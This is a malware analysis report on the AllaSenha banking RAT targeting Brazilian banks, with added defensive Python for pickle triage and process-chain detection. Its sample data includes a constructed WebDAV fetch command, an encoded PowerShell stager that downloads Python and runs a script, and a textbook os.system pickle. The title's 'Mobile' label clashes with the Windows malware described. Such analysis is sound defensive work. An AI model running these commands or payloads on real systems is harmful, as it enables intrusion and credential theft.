
AllaSenha Mobile Malware

Brazilian banks are the target of a new campaign delivering a Remote Access Trojan (RAT) dubbed AllaSenha. The malware is built to steal the credentials needed to access Brazilian bank accounts and uses Azure cloud services as its Command-and-Control (C2) infrastructure. Analysts who examined it assess it to be a customized variant of the Windows-based AllaKore RAT.

Banking institutions targeted in this campaign include Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob and Sicredi. The precise initial access method has not been confirmed, but the evidence points to malicious links in phishing messages.

The Initial Stage of the Attack Chain Delivering AllaSenha RAT

The attack starts with a malicious Windows shortcut (LNK) file posing as a PDF document ('NotaFiscal.pdf.lnk'), hosted on a WebDAV server since at least March 2024. There are also indications that the operators previously abused legitimate services such as Autodesk A360 Drive and GitHub to host their payloads.

When the shortcut is opened, it launches a Windows command shell that displays a decoy PDF to the recipient while also fetching a batch payload named 'c.cmd' from the same WebDAV location.

This file, known as the BPyCode launcher, runs a Base64-encoded PowerShell command that downloads a legitimate Python interpreter from the official www.python.org site and uses it to execute a Python script named BPyCode. Because the interpreter itself is a clean download from the vendor, the binary is not a useful indicator on its own; the process chain (cmd.exe launching encoded PowerShell that fetches and runs python.exe) is.

Additional Harmful Tools Deployed as Part of the Attack

BPyCode acts as a downloader for a dynamic-link library ('executor.dll') and executes it in memory. The DLL is fetched from one of several domain names produced by a domain generation algorithm (DGA).

The generated hostnames appear to correspond to the Microsoft Azure Functions service, a serverless platform that, in this context, lets the operators deploy and rotate staging infrastructure conveniently. Specifically, BPyCode retrieves a pickle file containing three items: a secondary Python loader script, a ZIP archive with the PythonMemoryModule package, and a second ZIP archive containing 'executor.dll.' Since unpickling is itself a code-execution primitive in Python, the pickle format is a natural fit for a stager, and an analyst who retrieves such a file should inspect it with pickletools rather than load it directly.
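Since unpickling arbitrary data can run code, a retrieved stage file of this kind should be examined without calling pickle.load on it. The following Python is an added example, not code from the original report or from the malware: it lists the globals a pickle would import using pickletools, loads it with an Unpickler whose find_class refuses every import, and enumerates the ZIP members of any archive the stage contains. The three-item stage it builds is a constructed stand-in for the one described above, and the protocol-0 os.system pickle is the textbook example of the pattern being refused, not a sample from this campaign.

```python
import io
import pickle
import pickletools
import zipfile
from typing import Any, Dict, List, Tuple


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global: the stream can only yield plain
    data (str, bytes, numbers, tuples, lists, dicts) and can never call code."""

    def find_class(self, module: str, name: str) -> Any:
        raise pickle.UnpicklingError(f"refusing to import {module}.{name} from untrusted pickle")


def pickle_imports(data: bytes) -> List[Tuple[str, str]]:
    """List the (module, name) pairs a pickle would import, using pickletools only,
    so nothing in the stream is executed. STACK_GLOBAL (protocol 4+) takes its
    operands from the two preceding string pushes; that is tracked heuristically."""
    imports, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif op.name == "STACK_GLOBAL":
            imports.append(tuple(strings[-2:]) if len(strings) >= 2 else ("?", "?"))
        elif "UNICODE" in op.name and isinstance(arg, str):
            strings.append(arg)
    return imports


def triage(data: bytes) -> Dict[str, Any]:
    """Describe a retrieved stage pickle without trusting it: the imports it would
    make, whether the restricted load refused it, and what its items are."""
    report: Dict[str, Any] = {"imports": pickle_imports(data), "refused": None, "items": None}
    try:
        obj = RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        report["refused"] = str(exc)
        return report
    items = []
    for item in obj if isinstance(obj, (tuple, list)) else [obj]:
        if isinstance(item, bytes) and item.startswith(b"PK\x03\x04"):
            # ZIP local file header: list members instead of extracting them
            with zipfile.ZipFile(io.BytesIO(item)) as zf:
                items.append(("zip", zf.namelist()))
        elif isinstance(item, bytes):
            items.append(("bytes", len(item)))
        elif isinstance(item, str):
            items.append(("script", len(item)))
        else:
            items.append((type(item).__name__, repr(item)[:40]))
    report["items"] = items
    return report


def _zip_bytes(name: str, content) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, content)
    return buf.getvalue()


# Constructed stand-in for the three-item stage described above (loader script,
# PythonMemoryModule archive, executor.dll archive); all contents are placeholders.
LOADER_SCRIPT = "print('second-stage loader placeholder')"
BENIGN_STAGE = pickle.dumps(
    (LOADER_SCRIPT,
     _zip_bytes("PythonMemoryModule/__init__.py", "# placeholder"),
     _zip_bytes("executor.dll", b"MZ placeholder")),
    protocol=4,
)
# Textbook protocol-0 pickle that calls os.system on load; not a sample from this
# campaign, included only to show the refusal path.
CODE_EXEC_PICKLE = b"cos\nsystem\n(S'echo pwned'\ntR."
# Protocol-4 reference to builtins.len, to exercise STACK_GLOBAL tracking.
STACK_GLOBAL_PICKLE = pickle.dumps(len, protocol=4)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_STAGE), ("code-exec", CODE_EXEC_PICKLE)):
        print(label, triage(blob))
```

The import listing runs first and on its own never executes anything; the restricted load is the second line of defence, so a stage that only carries data comes back with its items enumerated, while one that references any importable object is reported and refused before it can call it.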

The secondary Python loader script then uses PythonMemoryModule to load 'executor.dll,' a Borland Delphi-based loader also known as ExecutorLoader, into memory. ExecutorLoader's main job is to decode AllaSenha and inject it into a legitimate mshta.exe process, so the RAT runs inside a signed Microsoft binary.
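The delivery chain above leaves a recognisable trail in process-creation telemetry. The following Python is an added example, not code from the original report or from the malware: it decodes PowerShell -EncodedCommand arguments (Base64 over UTF-16LE) and flags the three links of the chain (cmd.exe launched from a WebDAV UNC path, encoded PowerShell fetching an interpreter from python.org, mshta.exe spawned by python.exe) over constructed Sysmon-style events. The command lines, IP address, user path and Python version in the sample are illustrative assumptions, not captured indicators.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    pid: int
    image: str
    command_line: str
    parent_image: str


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


# Windows WebDAV UNC syntax: \\host@SSL\DavWWWRoot\... or \\host@80\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@(?:SSL|\d+)\\", re.IGNORECASE)
# Download location of official Python interpreter builds.
PYTHON_ORG = re.compile(r"https?://(?:www\.)?python\.org/ftp/python/", re.IGNORECASE)
# -EncodedCommand and the unambiguous short forms PowerShell accepts (-e, -ec, -enc).
ENCODED_ARG = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Encode a script as -EncodedCommand expects: UTF-16LE text, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events: List[ProcessEvent]) -> List[Finding]:
    """Apply the three chain rules to a list of events and return what fired."""
    findings = []
    for ev in events:
        name, parent = _basename(ev.image), _basename(ev.parent_image)
        if name == "cmd.exe" and parent == "explorer.exe":
            m = WEBDAV_UNC.search(ev.command_line)
            if m:
                findings.append(Finding("cmd_from_webdav_share", ev.pid, m.group(0)))
        if name in ("powershell.exe", "pwsh.exe"):
            script = decode_encoded_command(ev.command_line)
            if script and PYTHON_ORG.search(script):
                findings.append(Finding("encoded_ps_fetches_python", ev.pid, script))
        if name == "mshta.exe" and parent in ("python.exe", "pythonw.exe"):
            findings.append(Finding("mshta_spawned_by_python", ev.pid, ev.parent_image))
    return findings


# Constructed sample modelled on the chain described above; paths, IP address and
# Python version are illustrative assumptions, not captured indicators.
STAGER_SCRIPT = (
    "$u='https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip';"
    "$d=\"$env:TEMP\\py\";Invoke-WebRequest $u -OutFile \"$d.zip\";"
    "Expand-Archive \"$d.zip\" $d;& \"$d\\python.exe\" \"$env:TEMP\\BPyCode.py\""
)
SAMPLE_EVENTS = [
    ProcessEvent(4321, r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c start \\203.0.113.7@80\DavWWWRoot\docs\NotaFiscal.pdf & "
                 r"\\203.0.113.7@80\DavWWWRoot\docs\c.cmd",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(4350, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER_SCRIPT),
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(4400, r"C:\Windows\System32\mshta.exe", "mshta.exe",
                 r"C:\Users\victim\AppData\Local\Temp\py\python.exe"),
    ProcessEvent(4500, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ipconfig",
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.detail[:80]}")
```

Decoding the encoded argument is the step that matters: the raw command line shows only Base64, and an alert keyed on "python.org" would never fire without it. The last event (an ordinary cmd.exe launched from Explorer) is included to show that the WebDAV rule does not fire on every shell.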

The AllaSenha RAT Harvests Victims’ Banking Credentials

Besides harvesting online banking credentials stored in web browsers, AllaSenha can display overlay windows to capture two-factor authentication (2FA) codes and can even coerce victims into scanning a QR code to authorize a fraudulent transaction initiated by the attackers.

AllaSenha carries the original file name Access_PC_Client_dll.dll, a name associated with the KL Gorki project. The banking malware appears to combine elements of AllaKore and a threat known as ServerSocket.

Closer inspection of the source code linked to the initial LNK file and to AllaSenha suggests that a Portuguese-speaking individual using the handle bert1m was involved in developing the malware. There is currently no evidence, however, that this person operates the tools directly.

Researchers note that cybercriminals operating in Latin America are remarkably productive in launching cybercrime campaigns. Although their main focus is stealing banking information from Latin American individuals, these actors frequently compromise computers belonging to subsidiaries or employees of organizations worldwide, particularly those in Brazil.
